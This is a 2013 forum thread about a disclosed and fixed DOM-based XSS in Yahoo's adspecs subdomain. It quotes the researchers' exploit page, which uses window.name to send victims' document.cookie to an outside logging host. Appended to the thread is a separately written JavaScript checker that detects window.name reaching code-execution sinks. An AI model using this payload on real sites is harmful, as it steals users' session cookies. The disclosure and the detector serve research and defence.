neox Posted January 29, 2013
Vulnerability PoC video: http://www.offensive-security.com/videos/yahoo-xss-0day.mp4
DOMSDAY Analyzing a DOM-Based XSS in Yahoo!
Abysssec Security Research
teko. Posted January 29, 2013
Interesting, and the code in that "evil.html" has not been made public, and I hope it doesn't become public.
nein Posted January 29, 2013
Is it an XSS in Yahoo Mail? In short..
nAb.h4x Posted January 29, 2013
> Is it an XSS in Yahoo Mail? In short..
Yes! It's a DOM-based XSS!
alexx666xx Posted January 29, 2013
It will be made public when the people at Yahoo fix the problem.
ionut97 Posted January 29, 2013
The paper clearly states that the vulnerability was in a JS script used by all the adspecs.yahoo.com subdomains. Everything has been reported and fixed.
http://www.exploit-db.com/wp-content/themes/exploit/docs/24109.pdf
"Final exploit":
<html>
<script>
window.name=' new Image().src="http://abysssec.com/log/log.php?cookie="+encodeURI(document.cookie); setTimeout(\"location.href = \'http:\/\/www.yahoo.com\';\",10);';
location.href="http://adspecs.yahoo.com/index.php";
</script>
</html>
Plus, the XSS could have been found with DOMinator.
Edited January 29, 2013 by ionut97
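The exploit quoted above delivers its code through window.name, which survives the navigation to the target page. As an added example (not from the paper, the thread, or Yahoo's code, and not a reproduction of DOMinator), here is a small line-based check that flags window.name reaching code-execution sinks; the function name, sink list and sample script are assumptions constructed here.

```javascript
// Heuristic source-to-sink check for window.name in JavaScript text.
// Line-based and regex-driven: a review aid, not a full parser or taint engine.
const SOURCE = /\b(?:window|self)\.name\b/;
const SINKS = [
  { name: "eval", re: /\beval\s*\(([^)]*)\)/ },
  { name: "setTimeout", re: /\bset(?:Timeout|Interval)\s*\(([^,)]*)/ },
  { name: "Function", re: /\bnew\s+Function\s*\(([^)]*)\)/ },
  { name: "document.write", re: /\bdocument\.write(?:ln)?\s*\(([^)]*)\)/ },
  { name: "innerHTML", re: /\.innerHTML\s*=\s*([^;]*)/ },
];
// Plain variable assignment (not a property write, comparison or arrow).
const ASSIGN = /(?<![.\w])([A-Za-z_]\w*)\s*=(?![=>])\s*([^;]+)/;

function findWindowNameSinks(code) {
  const tainted = new Set(); // variables that received window.name
  const findings = [];
  const isTainted = (expr) =>
    SOURCE.test(expr) ||
    [...tainted].some((v) => new RegExp("\\b" + v + "\\b").test(expr));

  code.split("\n").forEach((line, i) => {
    // Propagate taint through simple assignments: var cfg = window.name;
    const a = line.match(ASSIGN);
    if (a && isTainted(a[2])) tainted.add(a[1]);
    // Report any sink whose first argument or right-hand side is tainted.
    for (const sink of SINKS) {
      const m = line.match(sink.re);
      if (m && isTainted(m[1])) findings.push({ line: i + 1, sink: sink.name });
    }
  });
  return findings;
}

// Constructed sample script (hypothetical, for illustration only).
const SAMPLE = [
  "var cfg = window.name;",
  "if (cfg) { eval(cfg); }",
  'setTimeout("tick()", 10);',
  'document.title = "ads";',
  'var safe = JSON.parse(localStorage.getItem("k"));',
  "setTimeout(window.name, 0);",
].join("\n");

console.log(findWindowNameSinks(SAMPLE));
```

A script that only parses window.name as data, for example with JSON.parse, produces no findings here.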